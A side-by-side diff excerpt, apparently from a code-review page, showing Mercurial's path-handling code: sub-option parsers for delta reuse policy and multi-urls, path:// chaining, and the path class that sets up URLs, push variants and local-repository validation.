753 | 756 | b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE, |
|
754 | 757 | } |
|
755 | 758 | DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items()) |
|
756 | 759 | |
|
757 | 760 | |
|
758 | 761 | @pathsuboption( |
|
759 | 762 | b'pulled-delta-reuse-policy', |
|
760 | 763 | 'delta_reuse_policy', |
|
761 | 764 | display=DELTA_REUSE_POLICIES_NAME.get, |
|
762 | 765 | ) |
|
763 | 766 | def delta_reuse_policy(ui, path, value): |
|
764 | 767 | if value not in DELTA_REUSE_POLICIES: |
|
765 | 768 | path_name = path.name |
|
766 | 769 | if path_name is None: |
|
767 | 770 | # this is an "anonymous" path, config comes from the global one |
|
768 | 771 | path_name = b'*' |
|
769 | 772 | msg = _( |
|
770 | 773 | b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n' |
|
771 | 774 | ) |
|
772 | 775 | msg %= (path_name, value) |
|
773 | 776 | ui.warn(msg) |
|
774 | 777 | return DELTA_REUSE_POLICIES.get(value) |
|
775 | 778 | |
|
776 | 779 | |
|
777 | 780 | @pathsuboption(b'multi-urls', 'multi_urls', display=display_bool) |
|
778 | 781 | def multiurls_pathoption(ui, path, value): |
|
779 | 782 | res = stringutil.parsebool(value) |
|
780 | 783 | if res is None: |
|
781 | 784 | ui.warn( |
|
782 | 785 | _(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name |
|
783 | 786 | ) |
|
784 | 787 | res = False |
|
785 | 788 | return res |
|
786 | 789 | |
|
787 | 790 | |
|
788 | 791 | def _chain_path(base_path, ui, paths): |
|
789 | 792 | """return the result of "path://" logic applied on a given path""" |
|
790 | 793 | new_paths = [] |
|
791 | 794 | if base_path.url.scheme != b'path': |
|
792 | 795 | new_paths.append(base_path) |
|
793 | 796 | else: |
|
794 | 797 | assert base_path.url.path is None |
|
795 | 798 | sub_paths = paths.get(base_path.url.host) |
|
796 | 799 | if sub_paths is None: |
|
797 | 800 | m = _(b'cannot use `%s`, "%s" is not a known path') |
|
798 | 801 | m %= (base_path.rawloc, base_path.url.host) |
|
799 | 802 | raise error.Abort(m) |
|
800 | 803 | for subpath in sub_paths: |
|
801 | 804 | path = base_path.copy() |
|
802 | 805 | if subpath.raw_url.scheme == b'path': |
|
803 | 806 | m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') |
|
804 | 807 | m %= (path.rawloc, path.url.host) |
|
805 | 808 | raise error.Abort(m) |
|
806 | 809 | path.url = subpath.url |
|
807 | 810 | path.rawloc = subpath.rawloc |
|
808 | 811 | path.loc = subpath.loc |
|
809 | 812 | if path.branch is None: |
|
810 | 813 | path.branch = subpath.branch |
|
811 | 814 | else: |
|
812 | 815 | base = path.rawloc.rsplit(b'#', 1)[0] |
|
813 | 816 | path.rawloc = b'%s#%s' % (base, path.branch) |
|
814 | 817 | suboptions = subpath._all_sub_opts.copy() |
|
815 | 818 | suboptions.update(path._own_sub_opts) |
|
816 | 819 | path._apply_suboptions(ui, suboptions) |
|
817 | 820 | new_paths.append(path) |
|
818 | 821 | return new_paths |
|
819 | 822 | |
|
820 | 823 | |
|
821 | 824 | class path: |
|
822 | 825 | """Represents an individual path and its configuration.""" |
|
823 | 826 | |
|
824 | 827 | def __init__( |
|
825 | 828 | self, |
|
826 | 829 | ui=None, |
|
827 | 830 | name=None, |
|
828 | 831 | rawloc=None, |
|
829 | 832 | suboptions=None, |
|
830 | 833 | validate_path=True, |
|
831 | 834 | ): |
|
832 | 835 | """Construct a path from its config options. |
|
833 | 836 | |
|
834 | 837 | ``ui`` is the ``ui`` instance the path is coming from. |
|
835 | 838 | ``name`` is the symbolic name of the path. |
|
836 | 839 | ``rawloc`` is the raw location, as defined in the config. |
|
837 | 840 | ``_pushloc`` is the raw location pushes should be made to.
|
838 | 841 | (see the `get_push_variant` method) |
|
839 | 842 | |
|
840 | 843 | If ``name`` is not defined, we require that the location be a) a local |
|
841 | 844 | filesystem path with a .hg directory or b) a URL. If not, |
|
842 | 845 | ``ValueError`` is raised. |
|
843 | 846 | """ |
|
844 | 847 | if ui is None: |
|
845 | 848 | # used in copy |
|
846 | 849 | assert name is None |
|
847 | 850 | assert rawloc is None |
|
848 | 851 | assert suboptions is None |
|
849 | 852 | return |
|
850 | 853 | |
|
851 | 854 | if not rawloc: |
|
852 | 855 | raise ValueError(b'rawloc must be defined') |
|
853 | 856 | |
|
854 | 857 | self.name = name |
|
855 | 858 | |
|
856 | 859 | # set by path variant to point to their "non-push" version |
|
857 | 860 | self.main_path = None |
|
858 | 861 | self._setup_url(rawloc) |
|
859 | 862 | |
|
860 | 863 | if validate_path: |
|
861 | 864 | self._validate_path() |
|
862 | 865 | |
|
863 | 866 | _path, sub_opts = ui.configsuboptions(b'paths', b'*') |
|
864 | 867 | self._own_sub_opts = {} |
|
865 | 868 | if suboptions is not None: |
|
866 | 869 | self._own_sub_opts = suboptions.copy() |
|
867 | 870 | sub_opts.update(suboptions) |
|
868 | 871 | self._all_sub_opts = sub_opts.copy() |
|
869 | 872 | |
|
870 | 873 | self._apply_suboptions(ui, sub_opts) |
|
871 | 874 | |
|
872 | 875 | def _setup_url(self, rawloc): |
|
873 | 876 | # Locations may define branches via syntax <base>#<branch>. |
|
874 | 877 | u = url(rawloc) |
|
875 | 878 | branch = None |
|
876 | 879 | if u.fragment: |
|
877 | 880 | branch = u.fragment |
|
878 | 881 | u.fragment = None |
|
879 | 882 | |
|
880 | 883 | self.url = u |
|
881 | 884 | # the url from the config/command line before dealing with `path://` |
|
882 | 885 | self.raw_url = u.copy() |
|
883 | 886 | self.branch = branch |
|
884 | 887 | |
|
885 | 888 | self.rawloc = rawloc |
|
886 | 889 | self.loc = b'%s' % u |
|
887 | 890 | |
|
888 | 891 | def copy(self, new_raw_location=None): |
|
889 | 892 | """make a copy of this path object |
|
890 | 893 | |
|
891 | 894 | When `new_raw_location` is set, the new path will point to it. |
|
892 | 895 | This is used by the schemes extension to expand the scheme.
|
893 | 896 | """ |
|
894 | 897 | new = self.__class__() |
|
895 | 898 | for k, v in self.__dict__.items(): |
|
896 | 899 | new_copy = getattr(v, 'copy', None) |
|
897 | 900 | if new_copy is not None: |
|
898 | 901 | v = new_copy() |
|
899 | 902 | new.__dict__[k] = v |
|
900 | 903 | if new_raw_location is not None: |
|
901 | 904 | new._setup_url(new_raw_location) |
|
902 | 905 | return new |
|
903 | 906 | |
|
904 | 907 | @property |
|
905 | 908 | def is_push_variant(self): |
|
906 | 909 | """is this a path variant to be used for pushing""" |
|
907 | 910 | return self.main_path is not None |
|
908 | 911 | |
|
909 | 912 | def get_push_variant(self): |
|
910 | 913 | """get a "copy" of the path, but suitable for pushing |
|
911 | 914 | |
|
912 | 915 | This means using the value of the `pushurl` option (if any) as the url. |
|
913 | 916 | |
|
914 | 917 | The original path is available in the `main_path` attribute. |
|
915 | 918 | """ |
|
916 | 919 | if self.main_path: |
|
917 | 920 | return self |
|
918 | 921 | new = self.copy() |
|
919 | 922 | new.main_path = self |
|
920 | 923 | if self._pushloc: |
|
921 | 924 | new._setup_url(self._pushloc) |
|
922 | 925 | return new |
|
923 | 926 | |
|
924 | 927 | def _validate_path(self): |
|
925 | 928 | # When given a raw location but not a symbolic name, validate the |
|
926 | 929 | # location is valid. |
|
927 | 930 | if ( |
|
928 | 931 | not self.name |
|
929 | 932 | and not self.url.scheme |
|
930 | 933 | and not self._isvalidlocalpath(self.loc) |
|
931 | 934 | ): |
|
932 | 935 | raise ValueError( |
|
933 | 936 | b'location is not a URL or path to a local ' |
|
934 | 937 | b'repo: %s' % self.rawloc |
|
935 | 938 | ) |
|
936 | 939 | |
|
937 | 940 | def _apply_suboptions(self, ui, sub_options): |
|
938 | 941 | # Now process the sub-options. If a sub-option is registered, its |
|
939 | 942 | # attribute will always be present. The value will be None if there |
|
940 | 943 | # was no valid sub-option. |
|
941 | 944 | for suboption, (attr, func) in _pathsuboptions.items(): |
|
942 | 945 | if suboption not in sub_options: |
|
943 | 946 | setattr(self, attr, None) |
|
944 | 947 | continue |
|
945 | 948 | |
|
946 | 949 | value = func(ui, self, sub_options[suboption]) |
|
947 | 950 | setattr(self, attr, value) |
|
948 | 951 | |
|
949 | 952 | def _isvalidlocalpath(self, path): |
|
950 | 953 | """Returns True if the given path is a potentially valid repository. |
|
951 | 954 | This is its own function so that extensions can change the definition of |
|
952 | 955 | 'valid' in this case (like when pulling from a git repo into a hg |
|
953 | 956 | one).""" |
|
954 | 957 | try: |
|
955 | 958 | return os.path.isdir(os.path.join(path, b'.hg')) |
|
956 | 959 | # Python 2 may return TypeError. Python 3, ValueError. |
|
957 | 960 | except (TypeError, ValueError): |
|
958 | 961 | return False |
|
959 | 962 | |
|
960 | 963 | @property |
|
961 | 964 | def suboptions(self): |
|
962 | 965 | """Return sub-options and their values for this path. |
|
963 | 966 | |
|
964 | 967 | This is intended to be used for presentation purposes. |
|
965 | 968 | """ |
|
966 | 969 | d = {} |
|
967 | 970 | for subopt, (attr, _func) in _pathsuboptions.items(): |
|
968 | 971 | value = getattr(self, attr) |
|
969 | 972 | if value is not None: |
|
970 | 973 | d[subopt] = value |
|
971 | 974 | return d |